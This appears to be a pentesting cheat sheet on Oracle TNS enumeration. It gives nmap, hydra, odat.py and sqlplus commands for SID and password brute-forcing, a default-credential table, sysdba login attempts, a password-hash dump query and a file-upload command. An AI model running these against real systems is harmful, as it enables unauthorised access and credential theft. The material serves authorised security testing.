PRIMARY CATEGORY → PROTOCOLS AND SERVICES
REFERENCES | |
---|---|
Oracle Pentesting Best Practices | See here |
Pentesters Guide to Oracle Hacking | See here |
Looking into methods to penetrate OracleDB | See here |
SQLPlus Commands | See here |
Oracle TNS → Oracle Transparent Network Substrate
It is a network protocol that Oracle uses for communication between clients and servers
The TNS-Listener is an Oracle service that usually resides on the default port → 1521
Its main task is to accept connections from clients and connect them to a specific database via an instance
- Oracle Database
It is a Relational Database Management System (RDBMS) from the Oracle Corporation
The first step regarding Oracle Enumeration is always to interact with the Oracle TNS Service
Configuration Files
File | Description |
---|---|
listener.ora | Listener configuration, including ports and related databases |
tnsnames.ora | Contains the necessary information for clients to connect to the service |
Ports
- 1521 → TNS-Listener
It is the default port where Oracle TNS listens to map incoming connections to the corresponding instance in order to interact with the associated database
Service Scanning
Nmap
nmap -p1521 -sC -sV -T5 -n -Pn --disable-arp-ping <TARGET>
Oracle TNS Version
NSE Script →
oracle-tns-version
nmap -p1521 -sV --script oracle-tns-version -T5 -n -Pn --disable-arp-ping <TARGET>
TNS Listener Bruteforce
An error may arise when trying to connect to the Oracle TNS. This may be due to an incompatibility with the TNS version, or because the listener is password protected
If the latter, proceed as follows →
hydra -P <PASSWORD_WORDLIST> -t <THREADS> -s <PORT> <TARGET> oracle-listener
SID Enumeration
The SID or System Identifier is a unique identifier of an Oracle instance on a server
INFO
Note that an instance is a set of in-memory processes that interact with the information stored in a database
As a client, to connect to a specific database on an Oracle server, it is necessary to indicate the SID that identifies the instance associated with the database
If no SID can be accessed or none is known, then SID Bruteforce is required
SID Bruteforce
Odat.py
SIDGuesser Module
odat.py sidguesser -s <TARGET>
To use a Specific SID Dictionary
odat.py sidguesser -s <TARGET> --sids-file <SID_WORDLIST>
Nmap
nmap -p1521 --script oracle-sid-brute -n -Pn --disable-arp-ping <TARGET>
Wordlist →
/usr/share/nmap/nselib/data/oracle-sids
Hydra
hydra -L <SID_WORDLIST> -s <PORT> <TARGET> oracle-sid
Wordlist →
/usr/share/metasploit-framework/data/wordlists/sid.txt
Targeting Accounts
Once a valid SID is obtained, we can try to connect to the TNS-Listener to brute-force the credentials of the user accounts or simply to get valid users
Default Credentials
Username | Password |
---|---|
DBSNMP | DBSNMP |
SYS | CHANGE_ON_INSTALL |
pcms_sys | pcms_sys |
WMSYS | WMSYS |
OUTLN | OUTLN |
SCOTT | TIGER |
Accounts Bruteforce
Odat.py
PasswordGuesser Module
Default Wordlist →
accounts/accounts.txt
odat.py passwordguesser -s <TARGET> -p <PORT> -d <SID>
To use a Specific Oracle Credentials Wordlist
odat.py passwordguesser -s <TARGET> -p <PORT> -d <SID> --accounts-file <WORDLIST>
Connection to a Remote Database
SQLPlus
Alternatively, download the .rpm packages from here and use alien to convert them to .deb if necessary
Login with Valid Credentials
sqlplus <USERNAME>/<PASSWORD>@<TARGET>/<SID>
Login with Valid Credentials - Non-Default Port
sqlplus <USERNAME>/<PASSWORD>@<TARGET>:<PORT>/<SID>
Database Account Impersonation
Log in to the Oracle Database with sysdba/sysoper privileges
To attempt to log in to a specific Oracle instance as a privileged account with non-privileged user credentials →
- Sysdba
sqlplus <USERNAME>/<PASSWORD>@<TARGET>/<SID> 'as sysdba'
- Sysoper
sqlplus <USERNAME>/<PASSWORD>@<TARGET>/<SID> 'as sysoper'
Oracle Commands
List All Tables of the Current Database
> select table_name from all_tables;
Show the Current User Privileges
> select * from user_role_privs;
List All Existing Database Users
> select name, password from sys.user$;
Odat.py All In One
First, ODAT will search for a valid SID
If it finds at least one SID, then it will search for valid Oracle Accounts for each SID found
For each existing account of each valid instance (Oracle SID), ODAT will determine the attack or privilege-escalation vectors available to the found accounts
Full Enumeration
odat.py all -s <TARGET> -p <PORT>
Bruteforce Accounts for a Specific SID
odat.py all -s <TARGET> -p <PORT> -d <SID>
File Upload
Odat.py
odat.py utlfile -s <TARGET> -d <SID> -U <USERNAME> -P <PASSWORD> --sysdba --putFile <REMOTE_PATH> <REMOTE_FILE> <LOCAL_FILE>